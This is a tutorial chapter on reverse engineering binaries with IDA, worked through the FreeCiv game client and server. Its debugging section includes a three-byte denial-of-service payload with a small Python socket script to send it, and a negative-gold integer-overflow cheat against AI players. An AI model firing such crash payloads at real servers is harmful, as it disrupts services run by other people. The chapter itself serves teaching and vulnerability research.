Chapter 23. Binary Reverse Engineering

Finding and exploiting software flaws has always been one of the most effective ways to breach the security of a computer system or network. Likewise, if you are going to defend against this sort of attack, you need to find these bugs first so they can be fixed. Finding bugs is relatively straightforward if you have the source code, but what about closed-source binary programs? This class of software is very common on networks today. So how do you find these bugs when the code is not available to you? You reverse engineer the binary.

I've always loved to play video games; only trouble is, I'm not very good at them. I've learned to make up for my gaming inadequacies by reverse engineering the games so I can cheat. Odd as it might seem, I think this is the best way to practice reverse engineering skills or learn how to use a new tool. For the rest of this chapter, I'm going to reverse engineer an open source video game, FreeCiv 2.0.8. You can get a copy of this game, complete with source code, from http://www.freeciv.org. To get the most out of this chapter, you might want to install FreeCiv and follow along as I rip it apart from the binary. Because it's open source, you can even check your work as you go.

The Interactive Disassembler (IDA) is easily the most powerful disassembler in widespread use today. In my opinion, it is nothing short of amazing. It will disassemble almost anything you put in front of it, from run-of-the-mill x86 binaries to ARM and PDP-11 code (if you can find any). It has powerful automatic analysis abilities, and when those fail, it comes equipped with a rich scripting environment. For all its great features, IDA does have some pitfalls that you need to watch out for if you're going to get by.

Let's start things off by opening up civclient.exe. The first thing you will see when you open a binary in IDA is the menu in Figure 23-1. IDA will present you with a number of options here, but unless you know that IDA has definitely misidentified the binary type, it's best to leave it with defaults. The next thing you see is IDA doing its auto analysis phase. It might take a while to finish, so this is a good time to get a cup of coffee and read a blog or two while IDA does its thing.

IDA supports a variety of search options, including searching for text strings, immediate values, or a sequence of bytes. These are useful when you are looking for a specific place in a binary when you know what you're looking for. In the past, I've been able to find cryptography sections of a program by searching for the specific byte sequences used to initialize the cryptographic functions. IDA also gives you the ability to search for the next code section, data section, errors, void operands, and unexplored sections. This can be helpful if you are trying to clean up a disassembly image quickly to make it as close to a completely accurate disassembly as possible.
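To make the byte-sequence idea concrete outside of IDA, here is a minimal Python sketch. It assumes the target uses MD5 and stores the first MD5 initialization word (0x67452301, from the MD5 specification) in little-endian order, as an x86 binary would. The helper names find_all and find_md5_init and the toy image are my own inventions for illustration, not part of IDA.

```python
import struct

# MD5's four initial state words, as defined in the MD5 specification.
MD5_INIT_WORDS = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)


def find_all(image, pattern):
    """Return every offset at which pattern occurs in image."""
    hits = []
    pos = image.find(pattern)
    while pos != -1:
        hits.append(pos)
        pos = image.find(pattern, pos + 1)
    return hits


def find_md5_init(image):
    """Find the first MD5 init word stored little-endian (bytes 01 23 45 67)."""
    needle = struct.pack("<I", MD5_INIT_WORDS[0])
    return find_all(image, needle)


# Toy "binary": 16 bytes of padding, then the four constants, then zeros.
toy_image = b"\x90" * 16 + struct.pack("<4I", *MD5_INIT_WORDS) + b"\x00" * 8
md5_hits = find_md5_init(toy_image)
```

A hit is only a hint that cryptographic setup code or data may be nearby; you still have to inspect the surrounding disassembly to confirm it.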

Searching for text in the disassembly window is the most basic search you can do with IDA. This search looks for occurrences of the given text anywhere in the disassembly window, including things like function names and comments added to the code. Later we will find more powerful ways to search for strings in the binary that skip text that is not from the binary itself (e.g., user comments). For now though, let's use this feature to find something interesting in the game we're reverse engineering.

To get started, I'd like to find where the FreeCiv client (civclient.exe) manipulates money for our player. So let's do a text search for the word "gold" and see what we find. After searching for a few seconds, we find the following string:

Game: %s costs %d gold and you only have %d gold.

Paydirt! This is obviously a format string, and the third argument is probably the player's gold count. The code using this string looks like this:

.text:004081DD    mov dword ptr [esp], offset aGameSCostsDGol
.text:004081E4    call ds:libintl_gettext
.text:004081EA    mov edx, ds:dword_540A88
.text:004081F0    mov edx, [edx+2E0h]
.text:004081F6    mov [esp+0Ch], ebx
.text:004081FA    lea ebx, [ebp+var_408]
.text:00408200    mov [esp+8], eax
.text:00408204    mov eax, 200h
.text:00408209    mov [esp+14h], edx
.text:0040820D    mov [esp+10h], esi
.text:00408211    mov [esp+4], eax
.text:00408215    mov [esp+0], ebx
.text:00408218    call sub_42D5F0

If you look at the lines at .text:004081F0 and .text:00408209, you will see that the third argument passed to the subroutine after the format string is [edx+2E0h]. The offset 2E0h is into some structure in memory that is probably associated with our current player, and the field at that offset is probably the gold count.
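As a rough illustration of what "a field at offset 2E0h" means, the following Python sketch reads a 32-bit value out of a raw memory dump of such a structure. The structure size, the signed little-endian interpretation, and the name read_gold are assumptions for the example; only the offset 0x2E0 comes from the disassembly.

```python
import struct

GOLD_OFFSET = 0x2E0  # offset seen in "mov edx, [edx+2E0h]"


def read_gold(player_struct):
    """Read the 32-bit little-endian field at GOLD_OFFSET (assumed signed)."""
    (gold,) = struct.unpack_from("<i", player_struct, GOLD_OFFSET)
    return gold


# Fake player structure: zero-filled, with 150 gold written at the offset.
fake_player = bytearray(0x400)
struct.pack_into("<i", fake_player, GOLD_OFFSET, 150)
gold = read_gold(bytes(fake_player))
```

Applied to a real memory snapshot, the same read would let you compare the field against the gold total shown in the game to test the guess.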

All binary reverse engineering tools are designed with the goal of making the very low-level assembly code that makes up an executable into something a little easier to read and understand. One of the ways that IDA does this is by allowing us to define various high-level data types that we can overlay with structures in memory to help make sense of what the binary is doing. The three basic data types supported by IDA are structures, unions, and enumerated types.

We've already found some locations of interest within this binary, so it's useful to be able to keep some notes on what we're doing. IDA provides us with a number of ways to keep notes on what's going on in a program and to mark interesting parts of code for later review.

Now that we know how to manually traverse the code in the disassembly window, we could use this to manually compile information about a given function or variable by following all its function calls—but this would take way too much time. Luckily, while IDA was performing its auto-analysis of the file when we first opened it, it already figured out this information for us. This starts with something as simple as a call graph for a function, but current versions of IDA will also give us complete cross-references to and from a function as well as some pretty graphs and charts to help visualize all this data.

We've already seen one of the ways that IDA provides us with cross-reference information. Every function and variable has beside it an auto-generated comment with a list of memory locations where that function or variable is referenced. This is useful, but due to limitations on display space, this list is cut off after a few entries. You can increase the number of displayed cross-references by selecting Options → General..., clicking the tab labeled "Cross-references", and then increasing the value for "Number of displayed xrefs." You can get a complete list of cross-references by selecting the symbolic name and pressing the x key to bring up the cross-references window for this variable or function.
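Conceptually, a cross-reference list is just an index built from "who refers to whom" pairs. The Python sketch below builds both directions from a list of call edges. The function names in the edge list are hypothetical and do not come from civclient.exe; IDA's own database is of course far richer than this.

```python
from collections import defaultdict


def build_xrefs(call_edges):
    """Return (xrefs_to, xrefs_from) dictionaries built from (caller, callee) pairs."""
    xrefs_to = defaultdict(set)
    xrefs_from = defaultdict(set)
    for caller, callee in call_edges:
        xrefs_to[callee].add(caller)
        xrefs_from[caller].add(callee)
    return (
        {name: sorted(refs) for name, refs in xrefs_to.items()},
        {name: sorted(refs) for name, refs in xrefs_from.items()},
    )


# Hypothetical call edges, invented for illustration only.
edges = [
    ("handle_packet_a", "update_gold"),
    ("handle_packet_b", "update_gold"),
    ("update_gold", "redraw_ui"),
]
xrefs_to, xrefs_from = build_xrefs(edges)
```

Looking up a name in xrefs_to answers "who calls this?", which is the question the x key answers inside IDA.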

In addition to displaying lists of cross-references to a function or variable, IDA will give us a graph of all the cross-references to or from a given function or variable. This can be very helpful when we want to get an idea of how a function is used in relation to the rest of the program. Often you can tell almost all you need to know about a function simply by taking a peek at what functions call it and what functions it calls.

Earlier I did just that when searching for where civclient.exe modified the player's gold values. We found that in sub_41C130 there was some interesting code. Looking at the cross-reference graph, we can see what made me interested in this function. To get this graph, select View → Graphs → "Xrefs to". With a little bit of checking, we can see that the sub_41C130 subroutine is being called from the packet-processing code in the client. The more you look at it, the more it looks like the only place we adjust our gold is when we are processing packets from the server. I'll cut to the chase here and tell you the bad news. The client program takes all the information about our player, including how much gold we have, from the server. This is a major problem for our efforts to cheat, but don't despair because with the right tools we'll be able to fix this.

One reason that IDA is such a powerful reverse engineering tool is that it is able to clearly display massive amounts of information to the user with an interface that makes the data easy to digest quickly. It does this by breaking down the data into a number of data subview windows, which allows you to concentrate on different types of data separately.

We can learn a lot about a program by looking at its image on disk, but sometimes it can be really helpful to see the program as it is running. This is especially true for programs like malware that intentionally modify their code at runtime so that the image in memory is very different from the one on the disk. Debugging can also make it easier to follow data through an application. This is very important when doing vulnerability research because we spend most of our time tracking data to see how we can make it affect a system.

Now that we've located the place where packets are parsed in the server, let's attach to it with a debugger and see if we can find a useful bug. From the top menu, select Debugger → Start process to start the server in the debugger. Once you do this, you should take notice of the new memory layout that the system shows you. This is because we now have access to see all the runtime segments created by this process including the code and data for all the DLLs that the process links with.

A process will have much more information in the memory image used during debugging than it will in the binary image on disk. In some cases these images can be completely different. It is common for copy protection systems and malware to intentionally modify their memory segments when the program starts up to make reverse engineering difficult. In the later section "Making Scripts with IDC," we will discuss how to get around the best of these systems, but for now we can get around most of them by waiting for the system to decrypt its memory image for us and then saving a memory snapshot of it. To do this, select Debugger → "Take memory snapshot" from the top menu while in debugger mode.

Browsing around the packet-parsing code, I've found a couple of bugs that are of use to us here. The first is a denial-of-service attack in which we can cause the server to exit because it believes the system is out of memory. The idea for this first bug is to trick the server into letting us supply an argument to malloc that is way too large. I have annotated the disassembly for function sub_4A93F0 to show you how we trigger this bug:

.text:004A93F0    push ebp
.text:004A93F1    xor  ecx, ecx
.text:004A93F3    mov  ebp, esp
.text:004A93F5    push edi
.text:004A93F6    push esi
.text:004A93F7    push ebx
.text:004A93F8    sub  esp, 5Ch
.text:004A93FB    mov  eax, [ebp+arg_8]
.text:004A93FE    mov  [ebp+decompress_packet], 0
.text:004A9402    mov  edi, [ebp+arg_0]
.text:004A9405    mov  [ebp+header_len], 0
.text:004A940C    mov  byte ptr [eax], 0
.text:004A940F    cmp  byte ptr [edi+8], 0 ; is argument NULL?
.text:004A9413    jz   loc_4A94AA      ; if so jump to return
.text:004A9419    mov  edx, [edi+14h]  ; total length of the data
.text:004A941C    mov  eax, [edx]
.text:004A941E    cmp  eax, 2          ; do we have at least 3 bytes?
.text:004A9421    jle  loc_4A94AA      ; if not jump to return
.text:004A9427    mov  [esp+68h+var_60], eax
.text:004A942B    lea  ebx, [ebp+var_28]
.text:004A942E    mov  eax, [edx+0Ch]
.text:004A9431    mov  [esp+68h+var_68], ebx
.text:004A9434    mov  [esp+68h+var_64], eax
.text:004A9438    call sub_4A82A0      ; init length info
.text:004A943D    mov  [esp+68h+var_68], ebx
.text:004A9440    lea  eax, [ebp+length]
.text:004A9443    mov  [esp+68h+var_64], eax
.text:004A9447    call sub_4A8860      ; read 16bit short from packet
.text:004A944C    mov  eax, [ebp+length]
.text:004A944F    cmp  eax, 0FFFFh     ; is length == 0xFFFF?
.text:004A9454    jz   loc_4A95D0
.text:004A945A    cmp  eax, 4000h      ; is length > 0x4000?
.text:004A945F    jg   short loc_4A94B4 ; if so we take this branch

By examining data while debugging, we can determine that [edi+14h] is a structure offset that leads to the length of the packet (as returned by recv). The first check we have to pass to get any length value past the validation code is at .text:004A941E: the total packet length must be greater than 2. The next point of interest is at .text:004A9447, where the function reads in two octets and converts them to host order. We know that sub_4A8860 reads a short int from the network and converts it to host order by analyzing the flow chart for that function, as seen in Figure 23-4. As we see a few lines later, this value is being used as a length. At .text:004A945A the function checks whether this length value is greater than 0x4000. As we'll see in a minute, this is the most interesting code path to take, so let's make sure we send a length value larger than 0x4000. This takes us to the following code after the last jump instruction:

.text:004A94B4    mov [ebp+decompress_packet], 1
.text:004A94B8    sub eax, 4001h
.text:004A94BD    mov [ebp+header_len], 2
.text:004A94C4    jmp short loc_4A9461

The first line sets what appears to be some Boolean value to true. The next line is very interesting because it subtracts 0x4001 from the length we give it. I am always interested in places where I can get something to allocate zero bytes; even if we can't get that value to malloc, it is likely to do something interesting. The next line sets a local stack variable to 2. By looking at cross-references for this stack variable, we see that the possible values it is set with are always equal to the amount of length information the function has already read. This to me looks like it is a header length field. Experience tells me that protocols with length fields that include the length of the header are prone to errors. We have already shown that we can get a modified length value to be zero by setting the length field to be 0x4001, so this might get interesting. Let's see where it goes next:

.text:004A9461    mov [ebp+length2], eax
.text:004A9464    mov eax, [edi+14h]
.text:004A9467    xor ecx, ecx
.text:004A9469    mov edx, [ebp+length2]
.text:004A946C    cmp edx, [eax]      ; is length2 > packet length?
.text:004A946E    ja  short loc_4A94AA ; if so jump to return
.text:004A9470    cmp [ebp+decompress_packet], 0
.text:004A9474    jnz loc_4A9520      ; we take this branch

Right away they save the modified length value to the local stack variable that I have named length2. Remember that if we are able to set the length field in the packet to 0x4001, then length2 will be set to 0. At .text:004A946C, they check to make sure that this new length is not larger than the total number of bytes in the packet. We know we can make this new length zero, and zero is definitely less than the number of bytes in this packet, so we are able to evade this bounds check. Next, if you will remember, the Boolean variable decompress_packet was set to true in the last code block, so we take the jump at the bottom here:

.text:004A9520    mov eax, [ebp+header_len]
.text:004A9523    mov ebx, edx    ; edx holds the modified length
.text:004A9525    sub ebx, eax    ; alloc_len = length2 - header_len
.text:004A9527    lea eax, [ebx+ebx*4] ; do math to get alloc_len
.text:004A952A    lea eax, [eax+eax*4]
.text:004A952D    lea ecx, ds:0[eax*4]
.text:004A9534    mov [ebp+alloc_len], ecx
.text:004A9537    mov eax, offset aPackets_c ; "packets.c"
.text:004A953C    mov [esp+68h+var_5C], eax
.text:004A9540    mov eax, 179h
.text:004A9545    mov [esp+68h+var_60], eax
.text:004A9549    mov eax, offset aMalloc_27 ; "malloc"
.text:004A954E    mov [esp+68h+var_68], ecx ; alloc_len
.text:004A9551    mov [esp+68h+var_64], eax
.text:004A9555    call sub_405530

Just as expected, at .text:004A9525 they subtract the header length (in this case, 2) from the modified length value (in this case, 0). This means that there is an integer underflow here causing the allocation length to be much larger than the packet length. The three lines after the subtraction are an optimized way to multiply the allocation length by 100, thus making our allocation length even larger. The next interesting line is .text:004A954E, where they set the alloc_len to be the first argument to sub_405530.
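The arithmetic is easier to follow when it is written out. The following Python sketch is my own model of the path traced so far, under the assumption that all values are 32-bit and that the length field is a big-endian 16-bit value at the start of the packet. The name model_alloc_len is invented, and the 0xFFFF branch and the uncompressed branch are deliberately not modeled.

```python
import struct

MASK32 = 0xFFFFFFFF


def model_alloc_len(packet):
    """Return the 32-bit value handed to the allocator, or None if this
    model's code path would not reach the allocation."""
    if len(packet) <= 2:                              # cmp eax, 2 / jle
        return None
    (length,) = struct.unpack_from(">H", packet, 0)   # 16-bit, network order
    if length == 0xFFFF:                              # separate branch, not modeled
        return None
    if length <= 0x4000:                              # only the "jg" branch is modeled
        return None
    length2 = (length - 0x4001) & MASK32              # sub eax, 4001h
    header_len = 2                                    # mov [ebp+header_len], 2
    if length2 > len(packet):                         # cmp edx, [eax] / ja (unsigned)
        return None
    diff = (length2 - header_len) & MASK32            # sub ebx, eax
    return (diff * 100) & MASK32                      # the three lea instructions


# Length field 0x4001 plus one extra byte so the packet is 3 bytes long.
alloc_len = model_alloc_len(bytes([0x40, 0x01, 0x00]))
```

With a length field of 0x4001 the model yields 0xFFFFFF38, which is -200 as a signed value and roughly 4 GB when treated as an unsigned allocation size.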

.text:00405530    push ebp
.text:00405531    mov ebp, esp
.text:00405533    sub esp, 18h
.text:00405536    mov [ebp+var_C], ebx
.text:00405539    mov eax, [ebp+arg_8]
.text:0040553C    mov ebx, [ebp+alloc_len]
.text:0040553F    mov [ebp+var_4], edi
.text:00405542    mov edx, [ebp+arg_4]
.text:00405545    mov edi, [ebp+arg_C]
.text:00405548    mov [esp+18h+var_18], eax
.text:0040554B    mov eax, ebx
.text:0040554D    mov [ebp+var_8], esi
.text:00405550    mov [esp+18h+var_14], edi
.text:00405554    call sub_4054F0
.text:00405559    mov [esp+18h+var_18], ebx ; alloc_len
.text:0040555C    call malloc

Looking at the last two lines of this code block (.text:00405559 and .text:0040555C), you can see that our negative allocation length, which becomes a very large value when it is treated as an unsigned size, is passed to malloc. If you were to follow the code path that handles malloc failures, you would see that the server exits any time malloc fails because it thinks the system is out of memory. Here's the payload needed to trigger this bug:

40 01 00

You can test this out by sending that payload (which you can create in a hex editor) using a tool such as Netcat.
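If you would rather script it than use a hex editor and Netcat, a few lines of Python do the same job. This is a minimal sketch that assumes the server accepts plain TCP connections; the function name send_payload is my own, and the host and port are whatever your own test server uses.

```python
import socket

# Length field 0x4001 followed by one extra byte, as in the payload above.
PAYLOAD = bytes.fromhex("40 01 00")


def send_payload(host, port, payload=PAYLOAD):
    """Open a TCP connection, send the raw payload, and close the socket."""
    with socket.create_connection((host, port), timeout=5) as conn:
        conn.sendall(payload)
```

Call send_payload with the address and port of a server you own and are allowed to test, and watch the server process to see whether it exits.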

We might be able to keep from losing by crashing the server whenever we want, but that isn't going to help us win any games. The second bug is a little more complicated, but it will let us cheat enough to ensure an unfair advantage leading to a victory. Like the last bug, this one is an integer-handling flaw where we are able to trick the server into accepting invalid input.

I still would like to find a way to cheat and give us a huge amount of gold. After finding the last integer-handling flaw, I decided to check for similar integer-handling flaws in the gold code. This means I wanted to find the actions that change my gold amount where the client gets to choose the amount. One place where we can name our own price is in diplomatic negotiations. I decided to play a game where I make some valid diplomatic treaty offers including gold gifts and follow the packet processing until I see the transfer of this gold take place. This led me to the following code:

.text:004123A4    mov eax, [edx+2E0h] ; givers gold amount
.text:004123AA    mov ebx, [ecx+8]    ; amount of gold we offered
.text:004123AD    sub eax, ebx
.text:004123AF    mov [edx+2E0h], eax ; givers gold amount
.text:004123B5    mov edx, [ebp+var_2C]
.text:004123B8    mov eax, [ecx+8]    ; amount of gold we offered
.text:004123BB    add [edx+2E0h], eax ; receivers gold amount

Remember from our first attempts at modifying our gold count that the offset 0x2E0 probably refers to the gold value for a player. Here I had two ideas: first, we might get lucky and they might just trust the client to not offer more gold than it has, and second, we might be able to offer negative gold. We see here that if we were to offer a negative amount of gold as part of a treaty, and if the other player were to accept it, then we would in fact be taking money from them and giving it to ourselves. Let's see what the restrictions are on the amounts of gold we can offer. To do this, I set a watchpoint on my player's gold amount that would trigger on reads. This leads me to the following code:

.text:00411BF0    mov edx, [ebp+var_10]; case 0x1
.text:00411BF3    mov eax, [edi+8]
.text:00411BF6    cmp [edx+2E0h], eax
.text:00411BFC    jge loc_4117E1      ; default
.text:00411C02    mov [esp+48h+var_48], offset aGameYouDonTH_0

If we follow aGameYouDonTH_0, we find the following string:

Game: You don't have enough gold, you can't accept treaty.

This is a pretty strong indication that this is in fact the code that does validation on our gold amounts in treaty offers. So, what we can see here is that they are in fact checking to make sure that we don't offer more money than we have, but they are doing a signed check. This means that they are not verifying that we are not offering negative amounts of gold.
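To see why a signed comparison lets a negative offer through, here is a small Python model of the check and of the transfer code shown earlier. It assumes 32-bit signed gold values; the function names and the treasury figures are invented for the example.

```python
def to_int32(value):
    """Interpret value as a 32-bit two's-complement signed integer."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value


def offer_passes_check(giver_gold, offered):
    """Mirror 'cmp [edx+2E0h], eax / jge': signed giver_gold >= offered."""
    return to_int32(giver_gold) >= to_int32(offered)


def apply_transfer(giver_gold, receiver_gold, offered):
    """Mirror the sub/add pair: the giver loses 'offered', the receiver gains it."""
    return to_int32(giver_gold - offered), to_int32(receiver_gold + offered)


# Hypothetical treasuries: we hold 50 gold, the other player holds 1000.
negative_offer_ok = offer_passes_check(50, -500)
ours, theirs = apply_transfer(50, 1000, -500)
```

In this model an offer of 100 gold from a treasury of 50 is rejected, while an offer of -500 passes the check and moves 500 gold from the receiver to the giver.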

Putting this to the test, I tweaked the packets I was sending to the server so that I could offer negative amounts of gold to a player. Sure enough, just as expected, it lets me offer negative amounts of gold, and it does in fact end up operating just as if they gave me gold. This is an interesting result, but there is still one major problem with it. No player would accept a gift of negative gold unless they were very stupid, so offering this to a human player would not work. Most games include at least a few computer players, and unlike most humans, computers are all completely stupid. Let's see if we can't dupe the AI players into accepting this sort of offer. Looking at the cross-references for the function where the gold check was done, we find that there are two places it is called: sub_42D470 and sub_4B58D0. Let's set breakpoints at both, then get the client to send a treaty offer to an AI player. When we do that, the breakpoint triggers here only if the AI player accepts the treaty. When it does, it leads us to the following code in sub_4B58D0:

.text:004B5A0F    mov eax, [ebp+accept_treaty]
.text:004B5A12    test eax, eax ; is accept_treaty < 0 ?
.text:004B5A14    js short loc_4B5A47
.text:004B5A16    mov edx, [ebp+var_10]
.text:004B5A19    mov eax, [edx]
.text:004B5A1B    mov [ebp+arg_0], edi
.text:004B5A1E    mov [ebp+arg_4], eax
.text:004B5A21    add esp, 2Ch
.text:004B5A24    pop ebx
.text:004B5A25    pop esi
.text:004B5A26    pop edi
.text:004B5A27    pop ebp
.text:004B5A28    jmp sub_411740 ; This calls the checking code

The breakpoint told us that sub_411740 is reached only if the AI player has accepted the treaty, and this code jumps to sub_411740 only if accept_treaty is greater than or equal to zero. This means we can assume that the local stack variable accept_treaty is the indicator for whether the AI accepts the treaty. So let's look at the cross-references for accept_treaty and see what code affects this value:

.text:004B5950    call sub_4B5020
.text:004B5955    add [ebp+accept_treaty], eax

This code appears in a loop. Every time we call sub_4B5020, the return value is added to accept_treaty. So, we want to see what sub_4B5020 returns:

.text:004B5100    mov byte_4DB940, 1
.text:004B5107    mov eax, esi
.text:004B5109    mov ebx, [ebp+var_C]
.text:004B510C    mov esi, [ebp+var_8]
.text:004B510F    mov edi, [ebp+var_4]
.text:004B5112    mov esp, ebp
.text:004B5114    pop ebp
.text:004B5115    retn

This is the code that runs when sub_4B5020 returns, so we can see that whatever is in esi when it goes to return is what gets added to the accept_treaty value.

Looking at the top of this function, we find a big switch statement. Single stepping through this shows us that each case in the switch statement is for different clauses in the treaty. For gold, we see the following code:

.text:004B5250    cmp [ebp+var_11], 0; case 0x1
.text:004B5254    jz loc_4B53FE
.text:004B525A    mov ecx, [ebp+arg_0]
.text:004B525D    mov esi, [ecx+8]    ; gold offer amount
.text:004B5260    neg esi
.text:004B5262    jmp loc_4B5100      ; jump to return

This combines with the following code:

.text:004B53FE    mov ebx, [ebp+arg_0]
.text:004B5401    mov esi, [ebx+8]    ; gold offer amount
.text:004B5404    jmp loc_4B5100      ; jump to return

On the surface, what we see here is bad news. It seems that the amount of gold offered is directly added to the accept_treaty value. This means that a negative gold gift will effectively subtract from the value that must not be negative for the AI player to accept. Thinking further on this, I noticed a way to get around this problem. There is no check here for integer wrapping when they add this value to accept_treaty. This means that if we can find any other values that will subtract a predictable amount from accept_treaty, we can send a value so close to the most negative 32-bit integer that further subtractions will cause an integer wrap to a positive number, and the AI will accept the treaty. One way that I know we can get the computer to further subtract from accept_treaty is to declare war on the player.

I tested this, and sure enough, the AI player changed its mind and decided to accept my gift of negative gold. The final procedure for this is to declare war on an AI player, and then immediately offer them a peace treaty along with a large negative amount of gold. They will accept, you will generously give them a huge debt, and you will get a huge treasury, as shown in Figure 23-5.
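The wraparound can be reproduced with a few lines of Python that emulate 32-bit signed addition. This is only a sketch: the function names are mine, and the per-clause scores, including the -1000 penalty standing in for the declaration of war, are made-up numbers rather than values taken from the game.

```python
def to_int32(value):
    """Interpret value as a 32-bit two's-complement signed integer."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value


def ai_accepts(clause_scores):
    """Sum clause scores with 32-bit wraparound; accept when the total is not negative."""
    total = 0
    for score in clause_scores:
        total = to_int32(total + score)   # add [ebp+accept_treaty], eax
    return total >= 0, total              # 'js' is taken when total < 0


# A plain negative gold gift is rejected.
plain_result = ai_accepts([-500])

# A hugely negative gift plus a hypothetical war penalty wraps past the
# most negative 32-bit value and comes out positive.
wrapped_result = ai_accepts([-2147483000, -1000])
```

The second call shows the effect: -2147483000 plus -1000 does not fit in 32 bits, so the stored total becomes 2147483296 and the acceptance test passes.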

IDA's scripting feature is the most interactive part of the Interactive Disassembler. By writing scripts in IDC (IDA's internal scripting language), we can add hotkeys, automate large tedious tasks, and even add new features to the disassembler. This feature makes it relatively easy to take on difficult reverse engineering tasks such as unpacking obfuscated or encrypted binaries. It also makes it easy to clean up large areas of disassembly to account for shortcomings in IDA.

Up until now I haven't told you how to do anything useful. To be of any help, the IDC scripts need to be able to access the IDA database. IDA comes with a large set of built-in functions for reading and writing to the database. Just about anything you can do in the user interface, you can script in IDC. Table 23-1 provides a small list of the most common functions for accessing the database. For a more complete list, see the online documentation for IDC built-in functions.

Table 23-1. Functions for accessing the database

Built-in function name  Description
AddHotkey               Assigns an IDC routine to a hotkey.
AnalyseArea             Performs full analysis on a region.
AskStr                  Prompts the user for a string.
AskFile                 Prompts the user for a filename.
AskAddr                 Prompts the user for an address.
AskLong                 Prompts the user for a long integer value.
AskYN                   Prompts the user for "yes" or "no."
Byte                    Gets the value of a program byte.
ChooseFunction          Prompts the user for a function.
Comment                 Adds a regular comment.
CreateArray             Creates an array.
DelArrayElement         Removes an array element.
Dword                   Gets the value of a program double word.
Exec                    Executes an OS command.
ExtLinA                 Adds a comment above a line.
ExtLinB                 Adds a comment below a line.
FindText                Searches for text in the disassembly window.
FindBinary              Searches for binary strings in the image.
FindImmediate           Searches for immediate values.
FindFuncEnd             Finds the end of a function.
GetCurrentLine          Gets the disassembly line at the cursor.
GetFirstIndex           Gets the index of the first existing array element.
GetFuncOffset           Gets the function offset of an address.
GetFunctionName         Gets the name of a function at a given address.
GetInputFile            Gets the input filename.
GetMnem                 Gets the mnemonic for an instruction at the given address.
GetNextIndex            Gets the index of the next existing array element.
GetOpType               Gets the type of an instruction operand.
GetOperandValue         Gets the value used in an instruction operand.
GetOpnd                 Gets a string of an instruction operand.
GetOriginalByte         Gets the original value of a byte before patching is applied.
GetPrevIndex            Gets the index of the previous existing array element.
ItemEnd                 Gets the address of the end of the item at a specified address.
MakeArray               Marks data at an address as an array type.
MakeByte                Marks data at an address as a byte.
MakeCode                Marks data at an address as code.
MakeFunction            Marks data or code at an address as a function.
MaxEA                   Gets the largest valid program offset.
Message                 Prints a message in the status window.
MinEA                   Gets the smallest valid program offset.
ScreenEA                Gets the program address at the cursor.
SelEnd                  Gets the end address of a selected region.
SelStart                Gets the start address of a selected region.
Wait                    Waits for the end of auto-analysis.

If you work on a disassembly project long enough, you will eventually find yourself doing the same operations over and over again. For example, sometimes programs will mangle their string values in an effort to obfuscate things and make our job difficult. When I see this, I will usually write a script to descramble these strings and then bind that function call to a hotkey. Here is an example of such a function being bound to a hotkey:

1 #include <idc.idc>
2
3 static descrambleString (  ) {
4    auto s;
5    auto off;
6    auto start;
7    auto length;
8    auto left;
9    auto c;
10    auto last;
11
12    start = ScreenEA(  );
13    off = start;
14    length = Dword(off);
15    if(length > 4096) {
16        Message("length too large\n");
17        return;
18    }
19    left = length;
20    s = "";
21    off = start + 4;
22    c = 0;
23    last = 0;
24    while(left > 0) {
25        left = left - 1;
26        c = Byte(off+left)%256;
27        c = (c^last)%256;
28        last = c;
29        s = form("%c%s", c, s);
30    }
31    MakeRptCmt(start, s);
32    return;
33 }
34
35 static main (  ) {
36    AddHotkey("z", "descrambleString");
37 }

The format of the strings in this example is a four-byte length followed by a string where each successive character is XORed with the character after it in the string. Let's break down this code. We define our function, descrambleString, to have no arguments because the hotkey will not provide us with any. We get the input for this function on line 12 by calling ScreenEA. This function returns the address at which the cursor is currently set, and we use this value on line 14 when we call Dword to get the length value starting at that address. We then loop through the string, working backward from its last byte one byte at a time, because each character can only be recovered once the character after it is known. On line 31, we make a repeatable comment on the line by the string using the MakeRptCmt function. I could have used PatchByte to modify the string in the database instead of just documenting what the string stands for, but whenever possible I prefer to keep my changes to the binary to a minimum. Finally, in the main routine we register a hotkey with IDA bound to the z key. Don't forget to put the function name we want this hotkey to trigger in quotes.
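If you want to check the decoding logic outside of IDA, the same algorithm is easy to express in Python. This sketch assumes the four-byte length is little-endian (which is what Dword returns on x86) and that the characters are single bytes. The scramble helper is my own inverse of the scheme, added only to produce test data.

```python
import struct


def descramble(blob):
    """Decode a 4-byte little-endian length followed by XOR-chained bytes."""
    (length,) = struct.unpack_from("<I", blob, 0)
    if length > 4096:
        raise ValueError("length too large")
    data = blob[4:4 + length]
    if len(data) != length:
        raise ValueError("blob is shorter than its length field claims")
    out = bytearray(length)
    last = 0
    for i in range(length - 1, -1, -1):   # walk backward, like the IDC script
        last = data[i] ^ last             # recover this character
        out[i] = last
    return out.decode("latin-1")


def scramble(text):
    """Inverse helper (an assumption): XOR each byte with the byte after it."""
    plain = text.encode("latin-1")
    body = bytes(
        c ^ (plain[i + 1] if i + 1 < len(plain) else 0)
        for i, c in enumerate(plain)
    )
    return struct.pack("<I", len(plain)) + body


round_trip = descramble(scramble("gold"))
```

Because the last byte is stored unmodified, decoding has to start there and move toward the front, which is why both versions count down rather than up.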

My final example is a script that I use to clean up large disassemblies by searching for all void types in the data segment and heuristically detecting pointer values. When it finds these probable pointers, it sets their type appropriately. I find that this not only makes the data segment far more useful, but it also aids IDA in its auto-analysis so we get a better overall disassembly.

1 #include <idc.idc>
2
3 static fixDataOffsets (  ) {
4    auto off;
5    auto end;
6    auto val;
7
8    off = ScreenEA(  );
9    end = SegEnd(off);
10    off = SegStart(off);
11    while(off < end) {
12        // only fixup data offset...
13        if((hasValue(GetFlags(off))) && (GetMnem(off) == "")) {
14            val = Dword(off);
15            if((val >= 0x400000) && (val <= 0x500000)) {
16                OpOffEx(off, 0, 2, -1, 0, 0x0);
17            }
18            Wait(  );
19            off = ItemEnd(off);
20        } else if(GetMnem(off) != "") {
21            off = ItemEnd(off);
22        } else if(!hasValue(GetFlags(off))) {
23            Message("Complete.\n");
24            return;
25        } else {
26            off++;
27        }
28    }
29    Message("Complete.\n");
30    return;
31 }

